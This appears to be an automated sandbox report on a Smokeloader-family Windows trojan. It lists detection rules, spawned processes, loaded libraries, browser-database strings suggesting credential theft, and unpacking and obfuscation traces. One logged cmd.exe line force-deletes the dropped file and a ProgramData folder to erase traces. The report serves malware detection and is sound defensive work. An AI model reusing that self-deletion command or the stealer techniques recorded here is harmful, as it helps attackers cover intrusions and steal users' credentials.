Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/35@7/9

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

9_2_6CFA0300

Source: C:\Users\user\Desktop\4.exe

Code function: 0_2_02EF20CD CreateToolhelp32Snapshot,Module32First,

0_2_02EF20CD

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042B20E CoCreateInstance,

6_2_0042B20E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sdveeeu

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3192
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\F441.tmp

Jump to behavior

Source: 4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.9.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.9.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: F441.exe, 00000006.00000003.2062240344.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2547989323.000000000093D000.00000004.00000020.00020000.00000000.sdmp, AKECBF.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 4.exe	ReversingLabs: Detection: 39%
Source: 4.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\4.exe "C:\Users\user\Desktop\4.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sdveeeu C:\Users\user\AppData\Roaming\sdveeeu
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\4.exe	Unpacked PE file: 0.2.4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sdveeeu	Unpacked PE file: 5.2.sdveeeu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Unpacked PE file: 6.2.F441.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Unpacked PE file: 6.2.F441.exe.400000.0.unpack

PE file contains sections with non-standard names

Source: sqls[1].dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr	Static PE information: section name: .didat
Source: nss3.dll.9.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00402CD7 push cs; retf	0_2_00402CD8
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h	0_2_00401EB6
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_004033B6 push eax; ret	0_2_00403419
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD1F0E push 0000000Eh; retf 0038h	0_2_02DD1F1D
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD2D3E push cs; retf	0_2_02DD2D3F
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF4AC3 push eax; ret	0_2_02EF4AC4
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF38DD push 0000000Eh; retf 0038h	0_2_02EF38EC
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF386D push cs; retf 0038h	0_2_02EF38EC
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF444F push cs; retf	0_2_02EF4450
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF343A push ss; iretw	0_2_02EF344C
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF9919 push 0000002Ah; iretd	0_2_02EF9963
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00402CD7 push cs; retf	5_2_00402CD8
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401EA7 push 0000000Eh; retf 0038h	5_2_00401EB6
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_004033B6 push eax; ret	5_2_00403419
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E12D3E push cs; retf	5_2_02E12D3F
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E11F0E push 0000000Eh; retf 0038h	5_2_02E11F1D
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03013315 push 0000000Eh; retf 0038h	5_2_03013324
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03019351 push 0000002Ah; iretd	5_2_0301939B
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03012E72 push ss; iretw	5_2_03012E84
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03013E87 push cs; retf	5_2_03013E88
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030132A5 push cs; retf 0038h	5_2_03013324
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030144FB push eax; ret	5_2_030144FC
